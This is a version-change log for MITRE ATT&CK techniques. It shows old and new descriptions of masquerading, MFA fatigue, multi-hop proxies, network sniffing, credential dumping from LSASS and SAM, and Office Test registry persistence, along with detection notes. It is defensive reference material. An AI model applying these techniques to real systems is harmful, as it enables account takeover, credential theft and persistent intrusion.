modified2023-10-15 09:52:11.875000+00:002024-03-08 17:00:59.133000+00:00
descriptionAdversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names. Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site) Masquerading may also include the use of [Proxy](https://attack.mitre.org/techniques/T1090) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections.Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names. Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)
x_mitre_version1.61.7

[T1556] Modify Authentication Process

Current version: 2.4

Version changed from: 2.3 → 2.4

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-11 03:17:32.211000+00:002024-04-11 21:51:44.851000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.32.4
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesCloud Service: Cloud Service Modification

[T1556.006] Modify Authentication Process: Multi-Factor Authentication

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-16 16:47:26.119000+00:002024-04-16 00:20:21.488000+00:00
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesApplication Log: Application Log Content

[T1621] Multi-Factor Authentication Request Generation

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may attempt to bypass multi-factor authenticatiot1Adversaries may attempt to bypass multi-factor authenticatio
>n (MFA) mechanisms and gain access to accounts by generating>n (MFA) mechanisms and gain access to accounts by generating
> MFA requests sent to users.  Adversaries in possession of c> MFA requests sent to users.  Adversaries in possession of c
>redentials to [Valid Accounts](https://attack.mitre.org/tech>redentials to [Valid Accounts](https://attack.mitre.org/tech
>niques/T1078) may be unable to complete the login process if>niques/T1078) may be unable to complete the login process if
> they lack access to the 2FA or MFA mechanisms required as a> they lack access to the 2FA or MFA mechanisms required as a
>n additional credential and security control. To circumvent >n additional credential and security control. To circumvent 
>this, adversaries may abuse the automatic generation of push>this, adversaries may abuse the automatic generation of push
> notifications to MFA services such as Duo Push, Microsoft A> notifications to MFA services such as Duo Push, Microsoft A
>uthenticator, Okta, or similar services to have the user gra>uthenticator, Okta, or similar services to have the user gra
>nt access to their account.  In some cases, adversaries may >nt access to their account. If adversaries lack credentials 
>continuously repeat login attempts in order to bombard users>to victim accounts, they may also abuse automatic push notif
> with MFA push notifications, SMS messages, and phone calls,>ication generation when this option is configured for self-s
> potentially resulting in the user finally accepting the aut>ervice password reset (SSPR).(Citation: Obsidian SSPR Abuse 
>hentication request in response to “MFA fatigue.”(Citation: >2023)  In some cases, adversaries may continuously repeat lo
>Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue >gin attempts in order to bombard users with MFA push notific
>Attacks - PortSwigger)(Citation: Suspected Russian Activity >ations, SMS messages, and phone calls, potentially resulting
>Targeting Government and Business Entities Around the Globe)> in the user finally accepting the authentication request in
 > response to “MFA fatigue.”(Citation: Russian 2FA Push Annoy
 >ance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)
 >(Citation: Suspected Russian Activity Targeting Government a
 >nd Business Entities Around the Globe)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-04 03:06:34.448000+00:002024-04-19 04:26:29.365000+00:00
descriptionAdversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users. Adversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account. In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users. Adversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account. If adversaries lack credentials to victim accounts, they may also abuse automatic push notification generation when this option is configured for self-service password reset (SSPR).(Citation: Obsidian SSPR Abuse 2023) In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Obsidian SSPR Abuse 2023', 'description': 'Noah Corradin and Shuyang Wang. (2023, August 1). Behind The Breach: Self-Service Password Reset (SSPR) Abuse in Azure AD. Retrieved March 28, 2024.', 'url': 'https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/'}
x_mitre_contributorsObsidian Security

[T1090.003] Proxy: Multi-hop Proxy

Current version: 2.1

Version changed from: 2.0 → 2.1


Old Description
New Description
t1To disguise the source of malicious traffic, adversaries mayt1Adversaries may chain together multiple proxies to disguise 
> chain together multiple proxies. Typically, a defender will>the source of malicious traffic. Typically, a defender will 
> be able to identify the last proxy traffic traversed before>be able to identify the last proxy traffic traversed before 
> it enters their network; the defender may or may not be abl>it enters their network; the defender may or may not be able
>e to identify any previous proxies before the last-hop proxy> to identify any previous proxies before the last-hop proxy.
>. This technique makes identifying the original source of th> This technique makes identifying the original source of the
>e malicious traffic even more difficult by requiring the def> malicious traffic even more difficult by requiring the defe
>ender to trace malicious traffic through several proxies to >nder to trace malicious traffic through several proxies to i
>identify its source. A particular variant of this behavior i>dentify its source.  For example, adversaries may construct 
>s to use onion routing networks, such as the publicly availa>or use onion routing networks – such as the publicly availab
>ble TOR network. (Citation: Onion Routing)  In the case of n>le [Tor](https://attack.mitre.org/software/S0183) network – 
>etwork infrastructure, particularly routers, it is possible >to transport encrypted C2 traffic through a compromised popu
>for an adversary to leverage multiple compromised devices to>lation, allowing communication with any device within the ne
> create a multi-hop proxy chain within the Wide-Area Network>twork.(Citation: Onion Routing)  In the case of network infr
> (WAN) of the enterprise.  By leveraging [Patch System Image>astructure, it is possible for an adversary to leverage mult
>](https://attack.mitre.org/techniques/T1601/001), adversarie>iple compromised devices to create a multi-hop proxy chain (
>s can add custom code to the affected network devices that w>i.e., [Network Devices](https://attack.mitre.org/techniques/
>ill implement onion routing between those nodes.  This custo>T1584/008)). By leveraging [Patch System Image](https://atta
>m onion routing network will transport the encrypted C2 traf>ck.mitre.org/techniques/T1601/001) on routers, adversaries c
>fic through the compromised population, allowing adversaries>an add custom code to the affected network devices that will
> to communicate with any device within the onion routing net> implement onion routing between those nodes. This method is
>work.  This method is dependent upon the [Network Boundary B> dependent upon the [Network Boundary Bridging](https://atta
>ridging](https://attack.mitre.org/techniques/T1599) method i>ck.mitre.org/techniques/T1599) method allowing the adversari
>n order to allow the adversaries to cross the protected netw>es to cross the protected network boundary of the Internet p
>ork boundary of the Internet perimeter and into the organiza>erimeter and into the organization’s Wide-Area Network (WAN)
>tion’s WAN. Protocols such as ICMP may be used as a transpor>.  Protocols such as ICMP may be used as a transport.  Simil
>t.>arly, adversaries may abuse peer-to-peer (P2P) and blockchai
 >n-oriented infrastructure to implement routing between a dec
 >entralized network of peers.(Citation: NGLite Trojan)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_contributors['Eduardo Chavarro Ovalle']
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-10-21 17:54:28.280000+00:002024-04-19 13:24:36.872000+00:00
descriptionTo disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing) In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise. By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing) In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport. Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
x_mitre_version2.02.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'NGLite Trojan', 'description': 'Robert Falcone, Jeff White, and Peter Renals. (2021, November 7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer. Retrieved February 8, 2024.', 'url': 'https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/'}

[T1564.004] Hide Artifacts: NTFS File Attributes

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-29 22:46:56.308000+00:002024-02-14 21:56:34.831000+00:00
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T1040] Network Sniffing

Current version: 1.6

Version changed from: 1.5 → 1.6


Old Description
New Description
t1Adversaries may sniff network traffic to capture informationt1Adversaries may passively sniff network traffic to capture i
> about an environment, including authentication material pas>nformation about an environment, including authentication ma
>sed over the network. Network sniffing refers to using the n>terial passed over the network. Network sniffing refers to u
>etwork interface on a system to monitor or capture informati>sing the network interface on a system to monitor or capture
>on sent over a wired or wireless connection. An adversary ma> information sent over a wired or wireless connection. An ad
>y place a network interface into promiscuous mode to passive>versary may place a network interface into promiscuous mode 
>ly access data in transit over the network, or use span port>to passively access data in transit over the network, or use
>s to capture a larger amount of data.  Data captured via thi> span ports to capture a larger amount of data.  Data captur
>s technique may include user credentials, especially those s>ed via this technique may include user credentials, especial
>ent over an insecure, unencrypted protocol. Techniques for n>ly those sent over an insecure, unencrypted protocol. Techni
>ame service resolution poisoning, such as [LLMNR/NBT-NS Pois>ques for name service resolution poisoning, such as [LLMNR/N
>oning and SMB Relay](https://attack.mitre.org/techniques/T15>BT-NS Poisoning and SMB Relay](https://attack.mitre.org/tech
>57/001), can also be used to capture credentials to websites>niques/T1557/001), can also be used to capture credentials t
>, proxies, and internal systems by redirecting traffic to an>o websites, proxies, and internal systems by redirecting tra
> adversary.  Network sniffing may also reveal configuration >ffic to an adversary.  Network sniffing may reveal configura
>details, such as running services, version numbers, and othe>tion details, such as running services, version numbers, and
>r network characteristics (e.g. IP addresses, hostnames, VLA> other network characteristics (e.g. IP addresses, hostnames
>N IDs) necessary for subsequent Lateral Movement and/or Defe>, VLAN IDs) necessary for subsequent [Lateral Movement](http
>nse Evasion activities.  In cloud-based environments, advers>s://attack.mitre.org/tactics/TA0008) and/or [Defense Evasion
>aries may still be able to use traffic mirroring services to>](https://attack.mitre.org/tactics/TA0005) activities. Adver
> sniff network traffic from virtual machines. For example, A>saries may likely also utilize network sniffing during [Adve
>WS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap a>rsary-in-the-Middle](https://attack.mitre.org/techniques/T15
>llow users to define specified instances to collect traffic >57) (AiTM) to passively gain additional knowledge about the 
>from and specified targets to send collected traffic to.(Cit>environment.  In cloud-based environments, adversaries may s
>ation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring>till be able to use traffic mirroring services to sniff netw
>)(Citation: Azure Virtual Network TAP) Often, much of this t>ork traffic from virtual machines. For example, AWS Traffic 
>raffic will be in cleartext due to the use of TLS terminatio>Mirroring, GCP Packet Mirroring, and Azure vTap allow users 
>n at the load balancer level to reduce the strain of encrypt>to define specified instances to collect traffic from and sp
>ing and decrypting traffic.(Citation: Rhino Security Labs AW>ecified targets to send collected traffic to.(Citation: AWS 
>S VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mi>Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation:
>rroring) The adversary can then use exfiltration techniques > Azure Virtual Network TAP) Often, much of this traffic will
>such as Transfer Data to Cloud Account in order to access th> be in cleartext due to the use of TLS termination at the lo
>e sniffed traffic.(Citation: Rhino Security Labs AWS VPC Tra>ad balancer level to reduce the strain of encrypting and dec
>ffic Mirroring)  On network devices, adversaries may perform>rypting traffic.(Citation: Rhino Security Labs AWS VPC Traff
> network captures using [Network Device CLI](https://attack.>ic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) Th
>mitre.org/techniques/T1059/008) commands such as `monitor ca>e adversary can then use exfiltration techniques such as Tra
>pture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embed>nsfer Data to Cloud Account in order to access the sniffed t
>ded_packet_on_software)>raffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirror
 >ing)  On network devices, adversaries may perform network ca
 >ptures using [Network Device CLI](https://attack.mitre.org/t
 >echniques/T1059/008) commands such as `monitor capture`.(Cit
 >ation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_
 >on_software)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-07-10 15:48:01.560000+00:002024-04-19 12:32:44.370000+00:00
descriptionAdversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities. In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring) On network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Network sniffing may reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or [Defense Evasion](https://attack.mitre.org/tactics/TA0005) activities. Adversaries may likely also utilize network sniffing during [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) (AiTM) to passively gain additional knowledge about the environment. In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring) On network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.51.6
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsEliraz Levi, Hunters

[T1003] OS Credential Dumping

Current version: 2.2

Version changed from: 2.1 → 2.2


Old Description
New Description
t1Adversaries may attempt to dump credentials to obtain account1Adversaries may attempt to dump credentials to obtain accoun
>t login and credential material, normally in the form of a h>t login and credential material, normally in the form of a h
>ash or a clear text password, from the operating system and >ash or a clear text password. Credentials can be obtained fr
>software. Credentials can then be used to perform [Lateral M>om OS cachesmemory, or structures.(Citation: Brining MimiK
>ovement](https://attack.mitre.org/tactics/TA0008) and access>atz to Unix) Credentials can then be used to perform [Latera
> restricted information.  Several of the tools mentioned in >l Movement](https://attack.mitre.org/tactics/TA0008) and acc
>associated sub-techniques may be used by both adversaries an>ess restricted information.  Several of the tools mentioned 
>d professional security testers. Additional custom tools lik>in associated sub-techniques may be used by both adversaries
>ely exist as well. > and professional security testers. Additional custom tools 
 >likely exist as well. 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator', 'SYSTEM', 'root']
values_changed
STIX FieldOld valueNew Value
modified2022-03-08 21:00:53.436000+00:002024-04-18 23:47:41.667000+00:00
descriptionAdversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information. Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well. Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information. Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
x_mitre_detection### Windows Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity. Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well. On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process. Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like [Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis. Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015) ### Linux To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc//maps, where the directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.### Windows Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity. Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well. On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process. Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like [Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis. Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015) ### Linux To obtain the passwords and hashes stored in memory, processes must open a maps file in the `/proc` filesystem for the process being analyzed. This file is stored under the path `/proc//maps`, where the `` directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.
x_mitre_version2.12.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Brining MimiKatz to Unix', 'description': 'Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.', 'url': 'https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf'}
x_mitre_contributorsTim (Wadhwa-)Brown
x_mitre_contributorsYves Yonan
x_mitre_data_sourcesFile: File Creation

[T1027] Obfuscated Files or Information

Current version: 1.6

Version changed from: 1.5 → 1.6

Details
values_changed
STIX FieldOld valueNew Value
modified2023-08-28 19:17:53.015000+00:002024-04-16 12:27:18.945000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.51.6
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1137.002] Office Application Startup: Office Test

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may abuse the Microsoft Office "Office Test" Regt1Adversaries may abuse the Microsoft Office "Office Test" Reg
>istry key to obtain persistence on a compromised system. An >istry key to obtain persistence on a compromised system. An 
>Office Test Registry location exists that allows a user to s>Office Test Registry location exists that allows a user to s
>pecify an arbitrary DLL that will be executed every time an >pecify an arbitrary DLL that will be executed every time an 
>Office application is started. This Registry key is thought >Office application is started. This Registry key is thought 
>to be used by Microsoft to load DLLs for testing and debuggi>to be used by Microsoft to load DLLs for testing and debuggi
>ng purposes while developing Office applications. This Regis>ng purposes while developing Office applications. This Regis
>try key is not created by default during an Office installat>try key is not created by default during an Office installat
>ion.(Citation: Hexacorn Office Test)(Citation: Palo Alto Off>ion.(Citation: Hexacorn Office Test)(Citation: Palo Alto Off
>ice Test Sofacy)  There exist user and global Registry keys >ice Test Sofacy)  There exist user and global Registry keys 
>for the Office Test feature:  * <code>HKEY_CURRENT_USER\Soft>for the Office Test feature, such as:  * <code>HKEY_CURRENT_
>ware\Microsoft\Office test\Special\Perf</code> * <code>HKEY_>USER\Software\Microsoft\Office test\Special\Perf</code> * <c
>LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf</c>ode>HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Specia
>ode>  Adversaries may add this Registry key and specify a ma>l\Perf</code>  Adversaries may add this Registry key and spe
>licious DLL that will be executed whenever an Office applica>cify a malicious DLL that will be executed whenever an Offic
>tion, such as Word or Excel, is started.>e application, such as Word or Excel, is started.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator', 'User']
x_mitre_system_requirements['Office 2007, 2010, 2013, and 2016']
values_changed
STIX FieldOld valueNew Value
modified2021-08-16 21:35:17.618000+00:002024-04-16 12:41:55.175000+00:00
descriptionAdversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy) There exist user and global Registry keys for the Office Test feature: * HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf * HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy) There exist user and global Registry keys for the Office Test feature, such as: * HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf * HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.
x_mitre_version1.11.2

[T1110.003] Brute Force: Password Spraying

Current version: 1.5

Version changed from: 1.4 → 1.5

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-16 16:55:18.014000+00:002024-03-07 14:33:34.201000+00:00
x_mitre_version1.41.5
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1566] Phishing

Current version: 2.5

Version changed from: 2.4 → 2.5

New Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
